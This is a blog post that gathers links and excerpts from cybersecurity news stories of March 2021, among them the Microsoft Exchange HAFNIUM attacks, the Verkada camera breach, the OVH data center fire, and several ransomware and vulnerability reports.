This posting is here to collect cyber security news in March 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in March 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
342 Comments
Tomi Engdahl says:
Supermicro, Pulse Secure Respond to Trickbot’s Ability to Target Firmware
https://www.securityweek.com/supermicro-pulse-secure-respond-trickbots-ability-target-firmware
Server and storage technology giant Supermicro and secure access solutions provider Pulse Secure have issued advisories to inform users that some of their products are vulnerable to the Trickbot malware’s ability to target firmware.
Tomi Engdahl says:
Thousands of Mobile Apps Expose Data via Misconfigured Cloud Containers
https://www.securityweek.com/thousands-mobile-apps-expose-data-misconfigured-cloud-containers
Thousands of mobile applications expose user data through insecurely implemented cloud containers, according to a new report from security vendor Zimperium.
The issue, the company notes, is rooted in the fact that many developers tend to overlook the security of cloud containers during the development process.
Cloud services help resolve the issue of storage space on mobile devices, and developers have numerous such solutions to choose from, some of the most popular being Amazon Web Services, Microsoft’s Azure, Google Storage, and Firebase, among others.
“All of these services allow you to easily store data and make it accessible to your apps. But, herein lies the risk, the ease of use of these services also makes it easy for the developer to misconfigure access policies – – potentially allowing anyone to access and in some cases even alter data,” Zimperium notes.
Unsecured Cloud Configurations Exposing Information in Thousands of Mobile Apps
https://blog.zimperium.com/unsecured-cloud-configurations-exposing-information-in-thousands-of-mobile-apps/
Tomi Engdahl says:
Microsoft Shares Additional Mitigations for Exchange Server Vulnerabilities Under Attack
https://www.securityweek.com/microsoft-shares-additional-mitigations-exchange-server-vulnerabilities-under-attack
Tomi Engdahl says:
https://www.securityweek.com/cybersecurity-ma-roundup-week-mar-1-2021
Tomi Engdahl says:
Casting a Wide Intrusion Net: Dozens Burned With Single Hack
https://www.securityweek.com/casting-wide-intrusion-net-dozens-burned-single-hack
The SolarWinds hacking campaign blamed on Russian spies and the “grave threat” it poses to U.S. national security are widely known. A very different — and no less alarming — coordinated series of intrusions also detected in December has gotten considerably less public attention.
Nimble, highly skilled criminal hackers believed to operate out of Eastern Europe hacked dozens of companies and government agencies on at least four continents by breaking into a single product they all used.
The victims include New Zealand’s central bank, Harvard Business School, Australia’s securities regulator, the high-powered U.S. law firm Jones Day — whose clients include former President Donald Trump — the rail freight company CSX and the Kroger supermarket and pharmacy chain. Also hit was Washington state’s auditor’s office, where the personal data of up to 1.3 million people gathered for an investigation into unemployment fraud was potentially exposed.
Tomi Engdahl says:
F1 Team Williams Unveils New Car After Hackers Foil Launch
https://www.securityweek.com/f1-team-williams-unveils-new-car-after-hackers-foil-launch
The Williams team presented its new Formula One car on Friday — after hackers foiled plans for an “augmented reality” launch — revealing a livery inspired by its “all-conquering cars of the 1980s and 1990s.”
The British team enters its first full season under the ownership of US-based investment firm Dorilton Capital.
The FW43B car has “a dramatic new visual identity sporting a livery inspired by Williams’ all-conquering cars of the 1980s and 1990s, combining blue, white and yellow accents.”
Williams had planned to reveal the car via an augmented reality app but scrapped it “because the app was hacked prior to launch.”
Tomi Engdahl says:
European Banking Authority discloses Exchange server hack
https://www.bleepingcomputer.com/news/security/european-banking-authority-discloses-exchange-server-hack/
Tomi Engdahl says:
Gab, a haven for pro-Trump conspiracy theories, has been hacked again
A failure to purge authentication tokens taken in the first breach leads to a second one.
https://arstechnica.com/information-technology/2021/03/gab-a-haven-for-pro-trump-conspiracy-theories-has-been-hacked-again/
Tomi Engdahl says:
William Turton / Bloomberg:
Hackers say they breached Verkada, accessing feeds and archives of 150K surveillance cameras inside clinics, police precincts, jails, schools, Tesla facilities — – Hacker group says it wanted to show prevalence of surveillance — Video footage was captured from Sequoia-backed startup Verkada
Cybersecurity
Hackers Breach Thousands of Security Cameras, Exposing Tesla, Jails, Hospitals
https://www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams
Hacker group says it wanted to show prevalence of surveillance
Video footage was captured from Sequoia-backed startup Verkada
A group of hackers say they breached a massive trove of security-camera data collected by Silicon Valley startup Verkada Inc., gaining access to live feeds of 150,000 surveillance cameras inside hospitals, companies, police departments, prisons and schools.
Companies whose footage was exposed include carmaker Tesla Inc. and software provider Cloudflare Inc. In addition, hackers were able to view video from inside women’s health clinics, psychiatric hospitals and the offices of Verkada itself. Some of the cameras, including in hospitals, use facial-recognition technology to identify and categorize people captured on the footage. The hackers say they also have access to the full video archive of all Verkada customers.
In a video seen by Bloomberg, a Verkada camera inside Florida hospital Halifax Health showed what appeared to be eight hospital staffers tackling a man and pinning him to a bed. Halifax Health is featured on Verkada’s public-facing website in a case study entitled: “How a Florida Healthcare Provider Easily Updated and Deployed a Scalable HIPAA Compliant Security System.”
Another video, shot inside a Tesla warehouse in Shanghai, shows workers on an assembly line. The hackers said they obtained access to 222 cameras in Tesla factories and warehouses.
The data breach was carried out by an international hacker collective and intended to show the pervasiveness of video surveillance and the ease with which systems could be broken into
Kottmann said their reasons for hacking are “lots of curiosity, fighting for freedom of information and against intellectual property, a huge dose of anti-capitalism, a hint of anarchism — and it’s also just too much fun not to do it.”
“We have disabled all internal administrator accounts to prevent any unauthorized access,” a Verkada spokesperson said in a statement. “Our internal security team and external security firm are investigating the scale and scope of this issue, and we have notified law enforcement.”
A person with knowledge of the matter said Verkada’s chief information security officer, an internal team and an external security firm are investigating the incident. The company is working to notify customers and set up a support line to address questions, said the person, who requested anonymity to discuss an ongoing investigation.
“This afternoon we were alerted that the Verkada security camera system that monitors main entry points and main thoroughfares in a handful of Cloudflare offices may have been compromised,” San Francisco-based Cloudflare said in a statement. “The cameras were located in a handful of offices that have been officially closed for several months.” The company said it disabled the cameras and disconnected them from office networks.
The hackers say they were able to access live feeds and archived video, in some cases including audio, of interviews between police officers and criminal suspects, all in the high-definition resolution known as 4K.
Kottmann said their group was able to obtain “root” access on the cameras, meaning they could use the cameras to execute their own code. That access could, in some instances, allow them to pivot and obtain access to the broader corporate network of Verkada’s customers, or hijack the cameras and use them as a platform to launch future hacks. Obtaining this degree of access to the camera didn’t require any additional hacking, as it was a built-in feature, Kottmann said.
The hackers’ methods were unsophisticated: they gained access to Verkada through a “Super Admin” account, allowing them to peer into the cameras of all of its customers. Kottmann says they found a user name and password for an administrator account publicly exposed on the internet. After Bloomberg contacted Verkada, the hackers lost access to the video feeds and archives, Kottmann said.
Tomi Engdahl says:
Kelly Sheridan / Dark Reading:
Linux Foundation debuts the Sigstore initiative, which aims to improve open source software supply chain security, and includes members like Google and Red Hat
https://www.darkreading.com/application-security/linux-foundation-debuts-sigstore-project-for-software-signing/d/d-id/1340360
Tomi Engdahl says:
FireEye CEO: Reckless Microsoft Hack Unusual for China
https://www.securityweek.com/fireeye-ceo-reckless-microsoft-hack-unusual-china
Cyber sleuths have already blamed China for a hack that exposed tens of thousands of servers running its Exchange email program to potential hacks. The CEO of a prominent cybersecurity firm says it now seems clear China also unleashed an indiscriminate, automated second wave of hacking that opened the way for ransomware and other cyberattacks.
The second wave, which began Feb. 26, is highly uncharacteristic of Beijing’s elite cyber spies and far exceeds the norms of espionage, said Kevin Mandia of FireEye. In its massive scale it diverges radically from the highly targeted nature of the original hack, which was detected in January.
“You never want to see a modern nation like China that has an offense capability — that they usually control with discipline — suddenly hit potentially a hundred thousand systems,” Mandia said Tuesday in an interview with The Associated Press.
Tomi Engdahl says:
Microsoft Ships Massive Security Patch Bundle
https://www.securityweek.com/microsoft-ships-massive-security-patch-bundle
It’s raining patches in the Microsoft Windows ecosystem.
The Redmond, Wash. software giant on Tuesday dropped a mega-batch of security updates with patches for a whopping 89 documented vulnerabilities, including one used in zero-day attacks against some in the white-hat hacker community.
This month’s Patch Tuesday whopper comes just one week after Microsoft scrambled out emergency fixes to provide cover for in-the-wild nation-state attacks targeting Exchange Server installations.
Microsoft has blamed those attacks on Chinese cyber-espionage actors operating from leased VPS (virtual private servers) in the United States. The APT group has hit tens of thousands of organizations around the world, including targeted sectors like defense contractors, policy think tanks, and NGOs.
Tomi Engdahl says:
Third French Hospital Hit by Cyberattack
https://www.securityweek.com/third-french-hospital-hit-cyberattack
A hospital in southwest France has seen some of its IT systems paralysed by a “ransomware” cyberattack, its management said Tuesday, the third such incident in the last month.
The 320-bed facility in Oloron-Sainte-Marie near the Pyrenees mountains was hit by the attack on Monday, with screens displaying a demand in English for $50,000 in Bitcoin.
Hospital workers have had to revert to working with pens and paper, since digital patient records are not available.
The management system, used to monitor medicine stocks and other supplies, has also been affected at a time when the hospital is taking part in vaccination efforts against Covid-19.
“We might get our systems back in 48 hours or in three months,” hospital director Frederic Lecenne told local newspaper La Republique des Pyrenees.
Tomi Engdahl says:
Apple Patches Remote Code Execution Bug in WebKit
https://www.securityweek.com/apple-patches-remote-code-execution-bug-webkit
Apple on Monday released patches for a vulnerability in WebKit that could allow attackers to execute code remotely on affected devices.
Tracked as CVE-2021-1844 and co-reported by Clément Lecigne of Google’s Threat Analysis Group and Alison Huffman of Microsoft Browser Vulnerability Research, the flaw was addressed with software updates for macOS, iOS, watchOS, and Safari.
To exploit the vulnerability, an attacker would simply need to craft a webpage containing malicious code, and then lure the victim into accessing that webpage, which would trigger the execution of code onto the victim’s machine.
Tomi Engdahl says:
Vulnerability That Allows Complete WordPress Site Takeover Exploited in the Wild
https://www.securityweek.com/vulnerability-allows-complete-wordpress-site-takeover-exploited-wild
A critical vulnerability identified in The Plus Addons for Elementor WordPress plugin could be exploited to gain administrative privileges to a website. The zero-day has been exploited in the wild, the Wordfence team at WordPress security company Defiant warns.
With more than 30,000 installations to date, The Plus Addons for Elementor is a premium plugin that has been designed to add several widgets to be used with the popular WordPress website builder Elementor.
The identified issue, Wordfence explains, resides in one of the added widgets, which provides the ability to insert user login and registration forms to Elementor pages.
Because the functionality is not properly configured, an attacker can create a new administrative user account on the vulnerable site, or even to log in as an existing administrative user, the researchers reveal.
Tomi Engdahl says:
Siemens Releases Several Advisories for Vulnerabilities in Third-Party Components
https://www.securityweek.com/siemens-releases-several-advisories-vulnerabilities-third-party-components
Siemens on Tuesday published 12 new security advisories to inform customers about nearly two dozen vulnerabilities affecting its products.
Half of the new advisories cover vulnerabilities in third-party components. One of these advisories is related to AMNESIA:33, a collection of vulnerabilities discovered recently in open source TCP/IP stacks. Siemens has been publishing advisories to describe the impact of these flaws on its products, and the latest advisory focuses on the impact of two AMNESIA:33 denial-of-service (DoS) flaws on SENTRON 3VA and PAC Meter products.
Two advisories are related to NUMBER:JACK, a set of TCP/IP stack vulnerabilities that were discovered even more recently. The advisories describe the impact of some NUMBER:JACK issues, ones that allow session hijacking, on the SIMATIC MV400 optical readers and PLUSCONTROL products used in the energy sector.
Siemens also informed customers that its SIMATIC NET CM 1542-1 and SCALANCE SC600 devices are affected by a DoS vulnerability that exists in libcurl, a multiprotocol file transfer library.
Tomi Engdahl says:
GitHub Informs Users of ‘Potentially Serious’ Authentication Bug
https://www.securityweek.com/github-informs-users-potentially-serious-authentication-bug
GitHub on Monday informed users that it had discovered what it described as an “extremely rare, but potentially serious” security bug related to how some authenticated sessions were handled.
The Microsoft-owned software development platform said the issue was discovered on March 2 and an initial patch was rolled out on March 5. A second patch was released on March 8 and on the evening of the same day the company decided to invalidate all authenticated sessions to completely eliminate the possibility of exploitation.
The vulnerability, which GitHub said existed at various times between February 8 and March 5, was caused by a race condition that in extremely rare circumstances resulted in a user’s session being routed to the browser of a different authenticated user, providing this second user with a valid and authenticated session cookie for the first user’s account.
“It is important to note that this issue was not the result of compromised account passwords, SSH keys, or personal access tokens (PATs) and there is no evidence to suggest that this was the result of a compromise of any other GitHub systems,” noted Mike Hanley, GitHub’s recently appointed chief security officer. “Instead, this issue was due to the rare and isolated improper handling of authenticated sessions. Further, this issue could not be intentionally triggered or directed by a malicious user.”
Tomi Engdahl says:
Flaws in Apple Location Tracking System Could Lead to User Identification
https://www.securityweek.com/flaws-apple-location-tracking-system-could-lead-user-identification
Vulnerabilities identified in offline finding (OF) — Apple’s proprietary crowd-sourced location tracking system — could be abused for user identification, researchers said in a report released this month.
Tomi Engdahl says:
Dangerous Malware Dropper Found in 9 Utility Apps on Googles Play
Store
https://blog.checkpoint.com/2021/03/09/dangerous-malware-dropper-found-in-9-utility-apps-on-googles-play-store/
Check Point Research (CPR) recently discovered a new dropper spreading
via the Google Play store. The dropper, dubbed Clast82, has the
ability to avoid detection by Google Play Protect, complete the
evaluation period successfully, and change the payload dropped from a
non-malicious payload to the AlienBot Banker and MRAT. The AlienBot
malware family is a Malware-as-a-Service (MaaS) for Android devices
that allows a remote attacker to inject malicious code into legitimate
financial applications.
https://etn.fi/index.php/13-news/11861-google-playsta-loytyi-vakava-dropper-haittaohjelma
Tomi Engdahl says:
Fortinet Addresses Latest Microsoft Exchange Server Exploits
https://www.fortinet.com/blog/threat-research/fortinet-addresses-latest-microsoft-exchange-server-exploits
As many as 30,000 businesses and government agencies across the US
have been targeted by an aggressive hacking campaign that exploits
vulnerabilities in versions of Microsoft Exchange Server, with some
experts claiming that hundreds of thousands of Exchange Servers have
been exploited worldwide. Microsoft is attributing these exploits to a
cyber espionage organization known as HAFNIUM, operating out of
mainland China. Microsoft Exchange Server is used by millions of
organizations for email and calendar, as well as a collaboration
solution.
Serious Security: Webshells explained in the aftermath of HAFNIUM
attacks
https://nakedsecurity.sophos.com/2021/03/09/serious-security-webshells-explained-in-the-aftermath-of-hafnium-attacks/
The cybersecurity meganews of the week, of course, is anything to do
with HAFNIUM. (To be clear, were going to write it as Hafnium from now
on, as Microsoft does in its top-level incident disclosure document,
so that it doesnt look as though were shouting all the time.).
Strictly speaking, Hafnium is the name that Microsoft uses to denote a
specific gang of cybercriminals, allegedly operating out China via
cloud services in the US.
Tomi Engdahl says:
Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch
and Jenkins Vulnerabilities
https://blog.netlab.360.com/threat-alert-z0miner-is-spreading-quickly-by-exploiting-elasticsearch-and-jenkins-vulnerabilities/
In recent months, with the huge rise of Bitcoin and Monroe, various
mining botnet have kicked into high gear, and our BotMon system
detects dozens of mining Botnet attacks pretty much every day, most of
them are old families, some just changed their wallets or propagation
methods, and z0Miner is one of them. z0Miner is a malicious mining
family that became active last year and has been publicly analyzed by
the Tencent Security Team. z0Miner was initially active when it
exploited the Weblogic unauthorized remote command execution
vulnerability for propagation.
Tomi Engdahl says:
Remediating Microsoft Exchange Vulnerabilities
https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities
On March 2, 2021, Microsoft released out-of-band security updates to
address vulnerabilities affecting Microsoft Exchange Server products.
On March 3, after CISA and partners observed active exploitation of
vulnerabilities, CISA issued Emergency Directive 21-02: Mitigate
Microsoft Exchange On-Premises Product Vulnerabilities and Alert
AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities.
Tomi Engdahl says:
SUPERNOVA Web Shell Deployment Linked to SPIRAL Threat Group
https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group
In late 2020, Secureworks® Counter Threat Unit (CTU) researchers
observed a threat actor exploiting an internet-facing SolarWinds
server to deploy the SUPERNOVA web shell. Additional analysis revealed
similarities to intrusion activity identified on the same network
earlier in 2020, suggesting the two intrusions are linked. CTU
researchers attribute the intrusions to the SPIRAL threat group.
Characteristics of the activity suggest the group is based in China.
Tomi Engdahl says:
Kiinalaiset vakoilijat iskivät Suomeen tietomurtojen sarjassa yksi
yhdistävä seikka
https://www.is.fi/digitoday/tietoturva/art-2000007849827.html
Maailmanlaajuisen Microsoft Exchange -sähköpostipalvelimiin tehdyn
hyökkäyksen seuraukset Suomessa alkavat vähitellen hahmottua.
Liikenne- ja viestintävirasto Traficomin alainen
Kyberturvallisuuskeskus antoi hyökkäyksestä harvinaisen punaisen
varoituksen. Keskus painotti varoituksessaan hyvin suorasanaisesti,
että jos organisaatiossa on käytetty tai käytetään
Exchange-palvelinta, tulee oletuksena olla että murto on hyvin
todennäköisesti tapahtunut.
Tomi Engdahl says:
Teinejä kosiskellaan valkohattuhakkereiksi kampanja alkoi
https://www.tivi.fi/uutiset/tv/35f162e5-b47e-41da-90e5-331a72d767e5
Nyt alkaneessa Generation Z Hack -haasteessa nuoria kannustetaan
mukaan valkohattuhaastekampanjaan, jossa he pääsevät kehittämään
hakkerointitaitoja turvallisessa ympäristössä. Haaste on suunnattu
13-18 -vuotiaille hakkereille. Ilmoittautumisessa ei kuitenkaan
käytetä vahvaa tunnistautumista, joten periaatteessa kuka tahansa
pääsee halutessaan mukaan. Vanhempien osallistujien on kuitenkaan
turha elätä toiveita palkkioiden saamisesta.
Tomi Engdahl says:
European Banking Authority restores email service in wake of Microsoft
Exchange hack
https://www.theregister.com/2021/03/09/eba_exchange_breach/
The European Banking Authority (EBA) has confirmed it is another
victim on the list of organisations affected by vulnerabilities in
Microsoft Exchange. The EBA hurriedly pulled its email servers offline
over the weekend as it realised that it was among the ranks of those
hit by flaws in Microsoft Exchange being targeted by miscreants..
While worries about personal data held in emails were a factor in the
move, by Monday the authority was feeling confident that the data
leaks stopped with its email servers and that no additional
information extraction had occurred.
Microsoft Exchange Server Attack Escalation Prompts Patching Panic
https://www.darkreading.com/attacks-breaches/microsoft-exchange-server-attack-escalation-prompts-patching-panic/d/d-id/1340349
US government officials weigh in on the attacks and malicious
activity, which researchers believe may be the work of multiple
groups. The critical Exchange Server vulnerabilities patched last week
by Microsoft are being weaponized in widespread attacks against
organizations worldwide. Attacks have escalated over the past two
weeks, prompting responses from US government and the security
community
Tomi Engdahl says:
A ‘Blockchain Bandit’ Is Guessing Private Keys and Scoring Millions
The larger lesson of an ongoing Ethereum crime spree: Be careful about who’s generating your cryptocurrency keys.
https://www.wired.com/story/blockchain-bandit-ethereum-weak-private-keys/
“You have a thief here that amassed this fortune and then lost it all when the market crashed.
ADRIAN BEDNAREK, INDEPENDENT SECURITY EVALUATORS
Tomi Engdahl says:
Russia says it’s restricting use of Twitter over failure to remove banned content
https://www.reuters.com/article/idUSR4N2KN028
Tomi Engdahl says:
Biggest datacenter of Europe burning like hell.
https://www.facebook.com/groups/majordomo/permalink/10161647383249522/
https://mobile.twitter.com/xgarreau/status/1369559995491172354
Tomi Engdahl says:
OVH Data Center Fire Darkens Popular Sites Worldwide
Fire at an OVH Data Center in Europe takes down thousands of sites, including WP Rocket and Imagify
https://www.searchenginejournal.com/ovh-data-center-fire-darkens-thousands-of-sites-worldwide/398485/
OVH Datacenter in France was engulfed in flames, taking down thousands of sites and businesses including popular plugins WP Rocket and Imagify. A multitude of businesses are tweeting updates to their clients.
OVH issued a status announcement on their cloud server support page:
“We are currently facing a major incident in our DataCenter of Strasbourg with a fire declared in the building SBG2.
Firefighters were immediately on the scene but could not control the fire in SBG2.
The whole site has been isolated, which impacts all our services on SBG1, SBG2, SBG3 and SBG4. If your production is in Strasbourg, we recommend to activate your Disaster Recovery Plan.
Tomi Engdahl says:
“Fire is over. Firefighters continue to cool the buildings with the water.
We don’t have the access to the site. That is why SBG1, SBG3, SBG4 won’t be restarted today.”
https://www.searchenginejournal.com/ovh-data-center-fire-darkens-thousands-of-sites-worldwide/398485/
Tomi Engdahl says:
Fire destroys OVHCloud’s SBG2 data center in Strasbourg
SBG1 also badly damaged, SBG3 and SBG4 are safe but won’t restart today
https://www.datacenterdynamics.com/en/news/fire-destroys-ovhclouds-sbg2-data-center-strasbourg/
OVHcloud’s SBG2 data center in Strasbourg has been destroyed by a fire which also damaged SBG1. No one was hurt in the fire, but all four data centers on the site will be closed today.
The fire broke out just after midnight, on Wednesday morning, and took six hours to bring under control, with more than 100 firefighters at the scene. The five-story, 500 sq m SBG2 data center was destroyed, while SBG1 was seriously damaged. SBG3 and SBG4 were protected by the firefighters. The site is currently off-limits on Wednesday morning, and none of the data centers on the site will restart today
The fire spread to two other buildings, damaging one other data center on the site. “A part of SBG1 is destroyed,”
OVHcloud had three staff on site, all of whom are unharmed.
A Franco-German pump boat, Europa 1, carrying a German crew, helped put out the fire, taking water directly from the Rhine.
The fire came just two days after OVHcloud announced it is taking the first steps toward an IPO, floating on the Paris stock market according to Reuters.
Tomi Engdahl says:
Supernova malware clues link Chinese threat group Spiral to SolarWinds server hacks
Updated: SolarWinds servers are being exploited to deploy the malicious .NET web shell.
https://www.zdnet.com/article/supernova-malware-clues-link-chinese-threat-group-spiral-to-solarwinds-hacks/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem%3A+Trending+Content&utm_medium=trueAnthem&utm_source=facebook
Tomi Engdahl says:
Warning the World of a Ticking Time Bomb
https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/
On Mar. 5, KrebsOnSecurity broke the news that at least 30,000
organizations and hundreds of thousands globally had been hacked. The
same sources who shared those figures say the victim list has grown
considerably since then, with many victims compromised by multiple
cybercrime groups. Security experts are now trying to alert and assist
these victims before malicious hackers launch what many refer to with
a mix of dread and anticipation as Stage 2, when the bad guys revisit
all these hacked servers and seed them with ransomware or else
additional hacking tools for crawling even deeper into victim
networks.
Tomi Engdahl says:
Hackers Breach Thousands of Security Cameras, Exposing Tesla, Jails,
Hospitals
https://www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams
A group of hackers say they breached a massive trove of
security-camera data collected by Silicon Valley startup Verkada Inc.,
gaining access to live feeds of 150,000 surveillance cameras inside
hospitals, companies, police departments, prisons and schools.
Companies whose footage was exposed include carmaker Tesla Inc. and
software provider Cloudflare Inc. In addition, hackers were able to
view video from inside womens health clinics, psychiatric hospitals
and the offices of Verkada itself.
Tomi Engdahl says:
OVH cloud datacenter destroyed by fire
https://blog.malwarebytes.com/malwarebytes-news/2021/03/ovh-cloud-datacenter-destroyed-by-fire/
A fire in one of the OVH datacenters has destroyed one datacenter and
knocked two others offline. It took 100 firefighters and 43 fire
trucks to fight the fire in the five-story building. Even though the
fire department was quick to respond, and the fire was brought under
control relatively quickly, the impact has been big. In a press
statement OVH promised to communicate as transparently as possible on
the progress of our analyses and the implementation of solutions..
Also:
https://www.bleepingcomputer.com/news/technology/ovh-data-center-burns-down-knocking-major-sites-offline/.
https://www.datacenterdynamics.com/en/news/fire-destroys-ovhclouds-sbg2-data-center-strasbourg/
Tomi Engdahl says:
Exchange servers under siege from at least 10 APT groups
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
ESET Research has found LuckyMouse, Tick, Winnti Group, and Calypso,
among others, are likely using the recent Microsoft Exchange
vulnerabilities to compromise email servers all around the world. On
2021-03-02, Microsoft released out-of-band patches for Microsoft
Exchange Server 2013, 2016 and 2019. These security updates fixed a
pre-authentication remote code execution (RCE) vulnerability chain
(CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065)
that allows an attacker to take over any reachable Exchange server,
without even knowing any valid account credentials. We have already
detected webshells on more than 5,000 email servers as of the time of
writing, and according to public sources, several important
organizations, such as the European Banking Authority, suffered from
this attack.
Tomi Engdahl says:
Ryuk ransomware hits 700 Spanish government labor agency offices
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-hits-700-spanish-government-labor-agency-offices/
The systems of SEPE, the Spanish government agency for labor, were
taken down following a ransomware attack that hit more than 700 agency
offices across Spain. “Currently, work is being done with the
objective of restoring priority services as soon as possible, among
which is the portal of the State Public Employment Service and then
gradually other services to citizens, companies, benefit and
employment offices,” an announcement on the agency’s website reads.
Tomi Engdahl says:
FBI-CISA Joint Advisory on Compromise of Microsoft Exchange Server
https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/fbi-cisa-joint-advisory-compromise-microsoft-exchange-server
CISA and the Federal Bureau of Investigation (FBI) have released a
Joint Cybersecurity Advisory (CSA) to address recently disclosed
vulnerabilities in Microsoft Exchange Server. CISA and FBI assess that
adversaries could exploit these vulnerabilities to compromise
networks, steal information, encrypt data for ransom, or even execute
a destructive attack.
Tomi Engdahl says:
Windowsin oletusselaimissa vakava haavoittuvuus päivitä heti
https://www.tivi.fi/uutiset/tv/61267ef1-7e3d-4ec9-ba30-f37f32df14cb
Kyberturvallisuuskeskus tiedottaa Internet Explorer- ja Edge
- -selaimista löytyneestä haavoittuvuudesta, joka voi johtaa
muistikorruptioon. Selaimet ovat Windows-käyttöjärjestelmän
oletusselaimia. Haavoittuvuuden avulla hyökkääjät voivat suorittaa
mielivaltaisia komentoja käyttäjän koneella ja hankkia
luottamuksellista tietoa. Microsoft julkaisi maaliskuun 2021
päivityskoosteessa Edge- ja Internet Explorer -selaimiin (versiot 9 ja
11) korjaavia päivityksiä, joilla haavoittuvuus korjataan.. Also:
https://arstechnica.com/gadgets/2021/03/microsoft-patches-critical-0day-that-north-korea-used-to-target-researchers/
Tomi Engdahl says:
Guidance on Remediating Networks Affected by the SolarWinds and Active
Directory/M365 Compromise
https://us-cert.cisa.gov/ncas/current-activity/2021/03/09/guidance-remediating-networks-affected-solarwinds-and-active
Since December 2020, CISA has been responding to a significant
cybersecurity incident involving an advanced persistent threat (APT)
actor targeting networks of multiple U.S. government agencies,
critical infrastructure entities, and private sector organizations.
The APT actor added malicious code to multiple versions of the
SolarWinds Orion platform and leveraged itas well as other techniques,
includingfor initial access to enterprise networks. After gaining
persistent, invasive access to select organizations enterprise
networks, the APT actor targeted their federated identity solutions
and their Active Directory/M365 environments.
Tomi Engdahl says:
Cyberattackers Exploiting Critical WordPress Plugin Bug
https://threatpost.com/cyberattackers-exploiting-critical-wordpress-plugin-bug/164663/
The security hole in the Plus Addons for Elementor plugin was used in
active zero-day attacks prior to a patch being issued. The Plus Addons
for Elementor plugin for WordPress has a critical security
vulnerability that attackers can exploit to quickly, easily and
remotely take over a website. First reported as a zero-day bug,
researchers said its being actively attacked in the wild. The plugin,
which has more than 30,000 active installations according to its
developer, allows site owners to create various user-facing widgets
for their websites, including user logins and registration forms that
can be added to an Elementor page. Elementor is a site-building tool
for WordPress.
Tomi Engdahl says:
Analyzing Attacks Against Microsoft Exchange Server With China Chopper
Webshells
https://unit42.paloaltonetworks.com/china-chopper-webshell/
Microsoft recently released patches for a number of zero-day Microsoft
Exchange Server vulnerabilities that are actively being exploited in
the wild by HAFNIUM, a suspected state-sponsored group operating out
of China. We provide an overview of the China Chopper webshell, a
backdoor which has been observed being dropped in these attacks. We
also analyze incidental artifacts, such as metadata, created by the
attacks themselves, which allow us to collect information and better
understand the nature and methodology of the attackers.
Tomi Engdahl says:
https://www.securityweek.com/researchers-show-first-side-channel-attack-against-apple-m1-chips
Tomi Engdahl says:
https://www.securityweek.com/latest-mass-hacks-highlight-challenge-biden-administration
Tomi Engdahl says:
https://www.securityweek.com/f5-patches-four-critical-bugs-big-ip-suite
Tomi Engdahl says:
European Police Pounce After Cracking Crime Chat Network
https://www.securityweek.com/european-police-pounce-after-cracking-crime-chat-network
Police said Wednesday they had arrested at least 80 people and carried out hundreds of raids in two European countries after shutting down an encrypted phone network used by organised crime groups.
Belgian, Dutch and French police said they hacked into the SKY ECC network, allowing them to look “over the shoulders” of suspects as they communicated with customised devices to plot drug deals and murders.
“During an action day on Tuesday, large numbers as well as numerous house searches and seizures were made in Belgium and the Netherlands,” Europol and its judicial twin agency Eurojust, said in a statement.
In France, law officials have identified some 2,000 users of SKY ECC “allowing for procedures to be opened relating to large-scale drug operations and attacks on people,” the Paris prosecutor said.
“The network we are dealing with seems to be almost exclusively used by large-scale criminals.”
Tomi Engdahl says:
Ax Sharma / BleepingComputer:
Data center operator OVH says a fire destroyed some of its sites in France, affecting cyber threat intelligence company Bad Packets, game maker Rust, and others — In a major unprecedented incident, data centers of OVH located in Strasbourg, France have been destroyed by fire.
OVH data center burns down knocking major sites offline
https://www.bleepingcomputer.com/news/technology/ovh-data-center-burns-down-knocking-major-sites-offline/
In a major unprecedented incident, data centers of OVH located in Strasbourg, France have been destroyed by fire.
OVH is the largest hosting provider in Europe and the third-largest in the world. The cloud computing company provides VPS, dedicated servers, and other web services.
Customers are being advised by the company to enact their disaster recovery plans after the fire has rendered multiple data centers unserviceable, impacting websites around the world.
Fire destroys Strasbourg data centers
OVH, the world’s third-largest and Europe’s largest hosting provider has been impacted by a disaster.
Its French data centers, SBG1, SBG2, SBG3, and SBG4 located in Strasbourgh were shut down to contain the damage from a fire that started in SBG2.
Major sites knocked offline, more expected
As a result of this incident major customers of OVH state their web services are inaccessible.
The list of impacted clients includes cyber threat intelligence company Bad Packets, provider of free chess server Lichess.org, videogame maker Rust, cryptocurrency exchange Deribit’s blog and docs sites, telecom company AFR-IX, encryption utility VeraCrypt, news outlet eeNews Europe, the art building complex Centre Pompidou, and many others.
Deribit has clarified to BleepingComputer that the outage only impacted their docs and blog sites and that the exchange was never down.
Although according to the OVH founder and chairman Octave Klaba, the fire has been contained as of early hours of March 10th, 2021, services are expected to remain unavailable at least for today.
“Fire is over. Firefighters continue to cool the buildings with the water.”
“We don’t have the access to the site. That is why SBG1, SBG3, SBG4 won’t be restarted today,” said Klaba.
Customers should immediately bring into effect their disaster recovery plans as OVH is working on restoring its services.
Tomi Engdahl says:
https://etn.fi/index.php/13-news/11869-f-secure-palkittiin-parhaasta-suojauksesta
Tomi Engdahl says:
Bloomberg:
Three former employees say that 100+ employees at Verkada could view the camera feeds of its thousands of customers via widely used super admin accounts — – Former employee said issue was raised with Verkada executives — Hackers gained access to 150,000 customer camera feeds
Verkada Workers Had Extensive Access to Private Customer Cameras
https://www.bloomberg.com/news/articles/2021-03-11/verkada-workers-had-extensive-access-to-private-customer-cameras
Former employee said issue was raised with Verkada executives
Hackers gained access to 150,000 customer camera feeds
More than 100 employees at security camera startup Verkada Inc. could peer through the cameras of its thousands of customers, including global corporations, schools and police departments, according to three former employees aware of the company’s security protocols.
